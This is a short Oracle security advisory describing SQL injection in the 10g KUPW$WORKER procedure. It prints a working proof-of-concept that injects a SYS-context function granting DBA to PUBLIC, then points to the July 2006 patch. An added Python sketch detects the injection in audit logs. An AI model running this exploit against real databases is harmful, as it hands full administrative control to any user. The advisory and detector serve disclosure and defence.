SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1
Details

The following proof of concept exploit code injects a custom PL/SQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.

Example

    -- Create a function first and inject this function.
    -- The function will be executed as user SYS.
    CREATE OR REPLACE FUNCTION F return number
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
    COMMIT;
    RETURN 1;
    END;
    /

    -- Inject the function in the vulnerable procedure
    exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6');

Patch Information

Apply the patches mentioned in Oracle Critical Patch Update July 2006.

© 2005 by Red-Database-Security GmbH - last update 17-nov-2005
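Added example, not part of the original advisory and not Oracle code: a detection sketch that scans captured SQL statements (for instance from an audit trail) for calls to KUPW$WORKER.MAIN whose string parameters carry SQL syntax, as in the proof of concept above. The indicator heuristics, the function names and the sample statements other than the advisory's own call are assumptions constructed for illustration.

```python
import re

# Call to the procedure named in the advisory (optional SYS. prefix, any case).
CALL_RE = re.compile(r"(?:\bsys\s*\.\s*)?kupw\$worker\s*\.\s*main\s*\(", re.I)

# Heuristics (assumptions of this example) for a parameter that carries SQL syntax.
INDICATORS = {
    "embedded quote": re.compile(r"'"),
    "comment marker": re.compile(r"--|/\*"),
    "boolean clause": re.compile(r"\b(?:and|or)\b\s+\S+\s*=", re.I),
    "qualified name": re.compile(r"\b[a-z_][\w$#]*\.[a-z_][\w$#]*", re.I),
}

def string_args(sql, pos):
    """Return the string literals of the argument list starting at pos,
    with doubled quotes ('') unescaped the way PL/SQL does."""
    args, i, n = [], pos, len(sql)
    while i < n and sql[i] != ")":          # ')' inside a literal is consumed below
        if sql[i] == "'":
            i, buf = i + 1, []
            while i < n:
                if sql[i] == "'":
                    if i + 1 < n and sql[i + 1] == "'":   # escaped quote
                        buf.append("'")
                        i += 2
                        continue
                    break                                  # closing quote
                buf.append(sql[i])
                i += 1
            args.append("".join(buf))
        i += 1
    return args

def inspect(statement):
    """Return (argument index, decoded value, indicator names) per suspicious argument."""
    findings = []
    for m in CALL_RE.finditer(statement):
        for idx, arg in enumerate(string_args(statement, m.end()), 1):
            hits = [name for name, rx in INDICATORS.items() if rx.search(arg)]
            if hits:
                findings.append((idx, arg, hits))
    return findings

SAMPLES = [
    "exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6');",             # from the advisory
    "BEGIN sys.kupw$worker.main('SYS_EXPORT_SCHEMA_01', 'SYSTEM'); END;",  # constructed, benign
    "SELECT ename FROM emp WHERE ename = 'O''Brien'",                      # constructed, unrelated
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(inspect(s) or "clean", "<-", s)
```

Decoding the literal before matching is what exposes the quote that terminates the string inside the vulnerable procedure; matching on the raw statement text would see only a well-formed escaped quote.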